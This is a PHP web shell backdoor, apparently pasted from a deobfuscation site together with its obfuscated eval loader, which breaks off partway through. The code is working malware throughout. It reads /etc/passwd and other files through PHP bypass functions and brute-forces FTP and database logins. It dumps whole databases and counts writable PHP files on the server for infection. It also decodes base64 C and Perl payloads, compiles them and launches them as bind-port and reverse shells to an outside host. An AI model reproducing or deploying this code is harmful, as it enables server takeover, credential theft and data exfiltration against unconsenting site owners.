echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value="submit"></form>';
if ($temp) {
echo '<pre class="ml1" style="margin-top:5px" id="Output">' .
$temp .
'</pre>';
}
echo '</div>';
hardFooter();
}
function actionLogout()
{
setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
die('bye!');
}
function actionSelfRemove()
{
if ($_POST['p1'] == 'yes') {
if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) {
die('Shell has been removed');
} else {
echo 'unlink error!';
}
}
if ($_POST['p1'] != 'yes') {
hardHeader();
}
echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
hardFooter();
}
function actionInfect()
{
hardHeader();
echo '<h1>Infect</h1><div class=content>';
if ($_POST['p1'] == 'infect') {
$target = $_SERVER['DOCUMENT_ROOT'];
function ListFiles($dir)
{
if ($dh = opendir($dir)) {
$files = [];
$inner_files = [];
while ($file = readdir($dh)) {
if ($file != '.' && $file != '..') {
if (is_dir($dir . '/' . $file)) {
$inner_files = ListFiles($dir . '/' . $file);
if (is_array($inner_files)) {
$files = array_merge($files, $inner_files);
}
} else {
array_push($files, $dir . '/' . $file);
}
}
}
closedir($dh);
return $files;
}
}
foreach (ListFiles($target) as $key => $file) {
$nFile = substr($file, -4, 4);
if ($nFile == '.php') {
if (
$file != $_SERVER['DOCUMENT_ROOT'] . $_SERVER['PHP_SELF'] &&
is_writeable($file)
) {
echo "$file<br>";
$i++;
}
}
}
echo "<font color=red size=14>$i</font>";
} else {
echo '<form method=post><input type=submit value=Infect name=infet></form>';
echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
}
hardFooter();
}
function actionBruteforce()
{
hardHeader();
if (isset($_POST['proto'])) {
echo '<h1>Results</h1><div class=content><span>Type:</span> ' .
htmlspecialchars($_POST['proto']) .
' <span>Server:</span> ' .
htmlspecialchars($_POST['server']) .
'<br>';
if ($_POST['proto'] == 'ftp') {
function bruteForce($ip, $port, $login, $pass)
{
$fp = @ftp_connect($ip, $port ? $port : 21);
if (!$fp) {
return false;
}
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif ($_POST['proto'] == 'mysql') {
function bruteForce($ip, $port, $login, $pass)
{
$res = mysqli_connect(
$ip . ':' . ($port ? $port : 3306),
$login,
$pass
);
mysqli_close($res);
return $res;
}
} elseif ($_POST['proto'] == 'pgsql') {
function bruteForce($ip, $port, $login, $pass)
{
$str =
"host='" .
$ip .
"' port='" .
$port .
"' user='" .
$login .
"' password='" .
$pass .
"' dbname=postgres";
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(':', $_POST['server']);
if ($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if (is_array($temp)) {
foreach ($temp as $line) {
$line = explode(':', $line);
++$attempts;
if (
bruteForce(@$server[0], @$server[1], $line[0], $line[0])
) {
$success++;
echo '<b>' .
htmlspecialchars($line[0]) .
'</b>:' .
htmlspecialchars($line[0]) .
'<br>';
}
if (@$_POST['reverse']) {
$tmp = '';
for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
$tmp .= $line[0][$i];
}
++$attempts;
if (
bruteForce(@$server[0], @$server[1], $line[0], $tmp)
) {
$success++;
echo '<b>' .
htmlspecialchars($line[0]) .
'</b>:' .
htmlspecialchars($tmp);
}
}
}
}
} elseif ($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if (is_array($temp)) {
foreach ($temp as $line) {
$line = trim($line);
++$attempts;
if (
bruteForce(
$server[0],
@$server[1],
$_POST['login'],
$line
)
) {
$success++;
echo '<b>' .
htmlspecialchars($_POST['login']) .
'</b>:' .
htmlspecialchars($line) .
'<br>';
}
}
}
}
echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
}
echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .
'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>' .
'<input type=hidden name=c value="' .
htmlspecialchars($GLOBALS['cwd']) .
'">' .
'<input type=hidden name=a value="' .
htmlspecialchars($_POST['a']) .
'">' .
'<input type=hidden name=charset value="' .
htmlspecialchars($_POST['charset']) .
'">' .
'<input type=hidden name=ne value="">' .
'<span>Server:port</span></td>' .
'<td><input type=text name=server value="127.0.0.1"></td></tr>' .
'<tr><td><span>Brute type</span></td>' .
'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>' .
'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>' .
'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>' .
'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .
'<td><input type=text name=login value="root"></td></tr>' .
'<tr><td><span>Dictionary</span></td>' .
'<td><input type=text name=dict value="' .
htmlspecialchars($GLOBALS['cwd']) .
'passwd.dic"></td></tr></table>' .
'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>';
echo '</div>';
hardFooter();
}
function actionSql()
{
class DbClass
{
var $type;
var $link;
var $res;
function __construct($type)
{
$this->type = $type;
}
function connect($host, $user, $pass, $dbname)
{
var_dump($host);
switch ($this->type) {
case 'mysql':
if ($this->link = mysqli_connect($host, $user, $pass)) {
return true;
}
break;
case 'pgsql':
$host = explode(':', $host);
if (!$host[1]) {
$host[1] = 5432;
}
if (
$this->link = @pg_connect(
"host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname"
)
) {
return true;
}
break;
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case 'mysql':
if (mysqli_select_db($this->link, $db)) {
return true;
}
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case 'mysql':
return $this->res = mysqli_query($this->link, $str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link, $str);
break;
}
return false;
}
function fetch()
{
$res = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case 'mysql':
return mysqli_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs()
{
switch ($this->type) {
case 'mysql':
return $this->query('SHOW databases');
break;
case 'pgsql':
return $this->res = $this->query(
"SELECT datname FROM pg_database WHERE datistemplate!='t'"
);
break;
}
return false;
}
function listTables()
{
switch ($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query(
"select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"
);
break;
}
return false;
}
function error()
{
switch ($this->type) {
case 'mysql':
return mysqli_error($this->link);
break;
case 'pgsql':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str)
{
switch ($this->type) {
case 'mysql':
if (function_exists('mysql_set_charset')) {
return mysqli_set_charset($str, $this->link);
} else {
$this->query('SET CHARSET ' . $str);
}
break;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str)
{
switch ($this->type) {
case 'mysql':
return $this->fetch(
$this->query(
"SELECT LOAD_FILE('" .
addslashes($str) .
"') as file"
)
);
break;
case 'pgsql':
$this->query(
"CREATE TABLE hard2(file text);COPY hard2 FROM '" .
addslashes($str) .
"';select file from hard2;"
);
$r = [];
while ($i = $this->fetch()) {
$r[] = $i['file'];
}
$this->query('drop table hard2');
return ['file' => implode("
", $r)];
break;
}
return false;
}
function dump($table, $fp = false)
{
switch ($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `' . $table . '`');
$create = mysql_fetch_array($res);
$sql = $create[1] . ";
";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$this->query('SELECT * FROM `' . $table . '`');
$i = 0;
$head = true;
while ($ = $this->fetch()) {
$sql = '';
if ($i % 1000 == 0) {
$head = true;
$sql = ";
";
}
$columns = [];
foreach ($ as $k => $v) {
if ($v === null) {
$[$k] = 'NULL';
} elseif (is_int($v)) {
$[$k] = $v;
} else {
$[$k] =
"'" . mysqli_real_escape_string($v) . "'";
}
$columns[] = '`' . $k . '`';
}
if ($head) {
$sql .=
'INSERT INTO `' .
$table .
'` (' .
implode(', ', $columns) .
") VALUES
(" .
implode(', ', $) .
')';
$head = false;
} else {
$sql .= "
,(" . implode(', ', $) . ')';
}
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$i++;
}
if (!$head) {
if ($fp) {
fwrite($fp, ";
");
} else {
echo ";
";
}
}
break;
case 'pgsql':
$this->query('SELECT * FROM ' . $table);
while ($ = $this->fetch()) {
$columns = [];
foreach ($ as $k => $v) {
$[$k] = "'" . addslashes($v) . "'";
$columns[] = $k;
}
$sql =
'INSERT INTO ' .
$table .
' (' .
implode(', ', $columns) .
') VALUES (' .
implode(', ', $) .
');' .
"
";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
}
break;
}
return false;
}
}
$db = new DbClass($_POST['type']);
if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') {
$db->connect(
$_POST['sql_host'],
$_POST['sql_login'],
$_POST['sql_pass'],
$_POST['sql_base']
);
$db->selectdb($_POST['sql_base']);
switch ($_POST['charset']) {
case 'Windows-1251':
$db->setCharset('cp1251');
break;
case 'UTF-8':
$db->setCharset('utf8');
break;
case 'KOI8-R':
$db->setCharset('koi8r');
break;
case 'KOI8-U':
$db->setCharset('koi8u');
break;
case 'cp866':
$db->setCharset('cp866');
break;
}
if (empty($_POST['file'])) {
ob_start('ob_gzhandler', 4096);
header('Content-Disposition: attachment; filename=dump.sql');
header('Content-Type: text/plain');
foreach ($_POST['tbl'] as $v) {
$db->dump($v);
}
exit();
} elseif ($fp = @fopen($_POST['file'], 'w')) {
foreach ($_POST['tbl'] as $v) {
$db->dump($v, $fp);
}
fclose($fp);
unset($_POST['p2']);
} else {
die(
'<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'
);
}
}
hardHeader();
echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p3 value=''><input type=hidden name=p2 value=''><input type=hidden name=c value='" .
htmlspecialchars($GLOBALS['cwd']) .
"'><input type=hidden name=charset value='" .
(isset($_POST['charset']) ? $_POST['charset'] : '') .
"'>
<td><label><select name='type'><option value='mysql' ";
if (@$_POST['type'] == 'mysql') {
echo 'selected';
}
echo ">MySql</option><option value='pgsql' ";
if (@$_POST['type'] == 'pgsql') {
echo 'selected';
}
echo ">PostgreSql</option></select></label></td>
<td><input type=text name=sql_host value=\"" .
(empty($_POST['sql_host'])
? 'localhost'
: htmlspecialchars($_POST['sql_host'])) .
"\"></td>
<td><input type=text name=sql_login value=\"" .
(empty($_POST['sql_login'])
? 'root'
: htmlspecialchars($_POST['sql_login'])) .
"\"></td>
<td><input type=text name=sql_pass value=\"" .
(empty($_POST['sql_pass'])
? ''
: htmlspecialchars($_POST['sql_pass'])) .
"\" required></td><td>";
$tmp = "<input type=text name=sql_base value=''>";
if (isset($_POST['sql_host'])) {
if (
$db->connect(
$_POST['sql_host'],
$_POST['sql_login'],
$_POST['sql_pass'],
$_POST['sql_base']
)
) {
switch ($_POST['charset']) {
case 'Windows-1251':
$db->setCharset('cp1251');
break;
case 'UTF-8':
$db->setCharset('utf8');
break;
case 'KOI8-R':
$db->setCharset('koi8r');
break;
case 'KOI8-U':
$db->setCharset('koi8u');
break;
case 'cp866':
$db->setCharset('cp866');
break;
}
$db->listDbs();
echo "<label><select name=sql_base><option value=''></option>";
while ($ = $db->fetch()) {
list($key, $value) = each($);
echo '<option value="' .
$value .
'" ' .
($value == $_POST['sql_base'] ? 'selected' : '') .
'>' .
$value .
'</option>';
}
echo '</select></label>';
} else {
echo $tmp;
}
} else {
echo $tmp;
}
echo "</td>
<td><input type=submit value='submit' onclick='fs(d.sf);'></td>
<td><input type=checkbox name=sql_count value='on'" .
(empty($_POST['sql_count']) ? '' : ' checked') .
"> count the number of rows</td>
</tr>
</table>
<script>
s_db='" .
@addslashes($_POST['sql_base']) .
"';
function fs(f) {
if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
if(f.p1) f.p1.value='';
if(f.p2) f.p2.value='';
if(f.p3) f.p3.value='';
}
}
function st(t,l) {
d.sf.p1.value = 'select';
d.sf.p2.value = t;
if(l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit();
}
function is() {
for(i=0;i<d.sf.elements['tbl[]'].length;++i)
d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
}
</script>";
if (isset($db) && $db->link) {
echo '<br/><table width=100% cellpadding=2 cellspacing=0>';
if (!empty($_POST['sql_base'])) {
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
$tbls_res = $db->listTables();
while ($ = $db->fetch($tbls_res)) {
list($key, $value) = each($);
if (!empty($_POST['sql_count'])) {
$n = $db->fetch(
$db->query('SELECT COUNT(*) as n FROM ' . $value . '')
);
}
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='" .
$value .
"'> <a href=# onclick=\"st('" .
$value .
"',1)\">" .
$value .
'</a>' .
(empty($_POST['sql_count'])
? ' '
: " <small>({$n['n']})</small>") .
'</nobr><br>';
}
echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
if (@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
$_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo "<script>d.sf.onsubmit=function(){st(\"" .
$_POST['p2'] .
"\", d.sf.p3.value)}</script><span>" .
$_POST['p2'] .
"</span> ({$num['n']} records) Page # <input type=text name='p3' value=" .
((int) $_POST['p3']) .
'>';
echo " of $pages";
if ($_POST['p3'] > 1) {
echo " <a href=# onclick='st(\"" .
$_POST['p2'] .
'", ' .
($_POST['p3'] - 1) .
")'>< Prev</a>";
}
if ($_POST['p3'] < $pages) {
echo " <a href=# onclick='st(\"" .
$_POST['p2'] .
'", ' .
($_POST['p3'] + 1) .
")'>Next ></a>";
}
$_POST['p3']--;
if ($_POST['type'] == 'pgsql') {
$_POST['p2'] =
'SELECT * FROM ' .
$_POST['p2'] .
' LIMIT 30 OFFSET ' .
$_POST['p3'] * 30;
} else {
$_POST['p2'] =
'SELECT * FROM `' .
$_POST['p2'] .
'` LIMIT ' .
$_POST['p3'] * 30 .
',30';
}
echo '<br><br>';
}
if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) {
$db->query(@$_POST['p2']);
if ($db->res !== false) {
$title = false;
echo '<table width=100% cellspacing=1 cellpadding=2 class=main>';
$line = 1;
while ($ = $db->fetch()) {
if (!$title) {
echo '<tr>';
foreach ($ as $key => $value) {
echo '<th>' . $key . '</th>';
}
reset($);
$title = true;
echo '</tr><tr>';
$line = 2;
}
echo '<tr class="l' . $line . '">';
$line = $line == 1 ? 2 : 1;
foreach ($ as $key => $value) {
if ($value == null) {
echo '<td><i>null</i></td>';
} else {
echo '<td>' .
nl2br(htmlspecialchars($value)) .
'</td>';
}
}
echo '</tr>';
}
echo '</table>';
} else {
echo '<div><b>Error:</b> ' .
htmlspecialchars($db->error()) .
'</div>';
}
}
echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') {
echo htmlspecialchars($_POST['p2']);
}
echo "</textarea><br/><input type=submit value='Execute'>";
echo '</td></tr>';
}
echo '</table></form><br/>';
if ($_POST['type'] == 'mysql') {
$db->query(
"SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"
);
if ($db->fetch()) {
echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='submit'></form>";
}
}
if (@$_POST['p1'] == 'loadfile') {
$file = $db->loadFile($_POST['p2']);
echo '<br/><pre class=ml1>' .
htmlspecialchars($file['file']) .
'</pre>';
}
} else {
echo htmlspecialchars($db->error());
}
echo '</div>';
hardFooter();
}
function actionNetwork()
{
hardHeader();
$back_connect_c =
'I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9';
$back_connect_p =
'IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';
$bind_port_c =
'I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9';
$bind_port_p =
'IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=';
echo "<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
<span>Bind port to /bin/sh</span><br/>
Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
</form>
<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
<span>Back-connect to</span><br/>
Server: <input type='text' name='server' value=" .
$_SERVER['REMOTE_ADDR'] .
"> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>
</form><br>";
if (isset($_POST['p1'])) {
function cf($f, $t)
{
($w = @fopen($f, 'w')) or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, base64_decode($t)) or
@fputs($w, base64_decode($t)) or
@file_put_contents($f, base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bpc') {
cf('/tmp/bp.c', $bind_port_c);
$ = ex('gcc -o /tmp/bp /tmp/bp.c');
@unlink('/tmp/bp.c');
$ .= ex('/tmp/bp ' . $_POST['p2'] . ' ' . $_POST['p3'] . ' &');
echo "<pre class=ml1>$" . ex('ps aux | grep bp') . '</pre>';
}
if ($_POST['p1'] == 'bpp') {
cf('/tmp/bp.pl', $bind_port_p);
$ = ex(which('perl') . ' /tmp/bp.pl ' . $_POST['p2'] . ' &');
echo "<pre class=ml1>$" . ex('ps aux | grep bp.pl') . '</pre>';
}
if ($_POST['p1'] == 'bcc') {
cf('/tmp/bc.c', $back_connect_c);
$ = ex('gcc -o /tmp/bc /tmp/bc.c');
@unlink('/tmp/bc.c');
$ .= ex('/tmp/bc ' . $_POST['p2'] . ' ' . $_POST['p3'] . ' &');
echo "<pre class=ml1>$" . ex('ps aux | grep bc') . '</pre>';
}
if ($_POST['p1'] == 'bcp') {
cf('/tmp/bc.pl', $back_connect_p);
$ = ex(
which('perl') .
' /tmp/bc.pl ' .
$_POST['p2'] .
' ' .
$_POST['p3'] .
' &'
);
echo "<pre class=ml1>$" . ex('ps aux | grep bc.pl') . '</pre>';
}
}
echo '</div>';
hardFooter();
}
if (empty($_POST['a'])) {
if (isset($) && function_exists('action' . $)) {
$_POST['a'] = $;
} else {
$_POST['a'] = 'FilesMan';
}
}
if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) {
call_user_func('action' . $_POST['a']);
}
Did this file decode correctly?
Original Code
<?php
eval(
str_rot13(
gzuncompress(
base64_decode(
'eNpVjk0LgkAURdcF/gcR17OKNtKmnPJb0yJoEyqamPOpaPjrmwlSe8vz3jv3KnqUYnowLeJEmbpTtQ5VmqGj2g9eSdM4bSlhSrMxF7ji4/FMYMIlLHhZasZ6JUfR7/QJb/UJuWK1dIKlC8yG6bHYeyMLQiSVBJdcxGBq9Z4Z2xJtNw8mUMda5+rHuM8l5FQgZ7DdPCJv2wq+lxnjcx14udDCDFtrgLLQLwRMbrBQgj+X8QGz8E9e'
)
)
)
);
eval(
$MctRJwTzX(
$RGGcrQBfUjR(
'eJztvet22ziyKPx/1pp3YNSepty2ZUm204ltOXF8SZybE19ydbaGoiiJMSWqScqXpPP3PMKsc84+a+11nuG8yPcM8yRfVQEgARKkKMfp6b3XVncSiQQKhUKhUCgUqv76l7l//uPfjZZh2o1ux/p15b7Tud9r3F1ZWe3Uu436itPs3f/Vse6tmRt/xbL/E8pGwcRhv/4P1jw92V+6x1//b3yw73pO+MIa8Wf/C54Nu2vVufbx3tGbvaOP5pOTk1ftU/jV3n689/LE/DQPJd2eUb3jhqETQcmdw8NnB3sfNdWeHB5jBaNmmOfONXybN77+9S8GfMaBH/nR9dipTq+2aCBi2Ow31rIzHEfXUOkVlPto2gMrAERk6JlX0CukQAIiRp4VHDlydSygvrfk13ILFsF2bX90UU3e4secRD0g9aL6NINZ6n3XsYPrsdIwdH8WEifwkGL477e8Xtl5vbJ/cK/sH9mrcSOvW/jmh/YLG/iBHWvmdqz5ozvW/KEdW8nt2MqP7tjK7XQM/u9NRnbk+qOkjTAKAPb4sgt1hGSCX9ChjhU6d1fbzsj2u06VinBYWCkpAKCoADyMC0Cltj3AQqYpP2MVk2cu/KrzH5cDEPNGFZ5tGlDOc0YMpkL0nh9Akc9UzYB/k6KEHzxaWFAqpNCBv6t+0CXIH+dcoNm/GfQbqn+c+wxDvKGpi2jXWjGcdBF3YSH1CPkHOrLVyu+J+HQCxzpPVf+W/Pym8GXgRJNglKY8R5GvPn/9y0N35LaReU0nCPyg7fl9WKBGE8/DIslbeN6mEiG8rqvvhtZV27ly7AmySztyh05cBt7Tg7bnDt2oyh52nZ47cqomMOXxweFLKGw2anUT3/31L8u/GNX/7//OG41GrVlvNAz/qGP8soxvaJ3jayUoDkXr29gKQ2Tyn3/mq7/6uEXL578rNC6zgi+yatn5n4Apr0UAHr//LouI6TWMOwxxVktBH+RD97nfd0dVdRbPrtlYn60rVfmYoRpMm2rH9715xPN/bqiCRMIxFiDyoBboaKo0nYROsN13RlEI7X1MydHHvt/3nLQgNY+9STDOPH1x/PKRH2Ueu1bbCuyBe+EEmXfvrVHXuco8PrKGHU8t/kmaqiqXMIZz+u2hFdmDanamm8smENUdjj2ctebvqDQmvSaCL7tpHNho5RJRLSzL/bSsGThW1wmqBGIZpqaxWl81XvqRse9PRl0zLfecK5ja8kNVEHVdR+phZXMQDb2tTWxjK3m8OXQiyxhZQ6dldp3QDtwx8oxpwFIZQZ9b5n7ghIMIeCusjZzI+N2QHowv1d+Rz3+e4E9498gJI+N4bA2H7qhvHA/8MTw8hYEM+gH2yXhhBeewvuZgBCvlJYj+8E+CjjWJBn6QRoaAm1uGka40iKLxkvPbxL1omTusytIJSDoJQORcR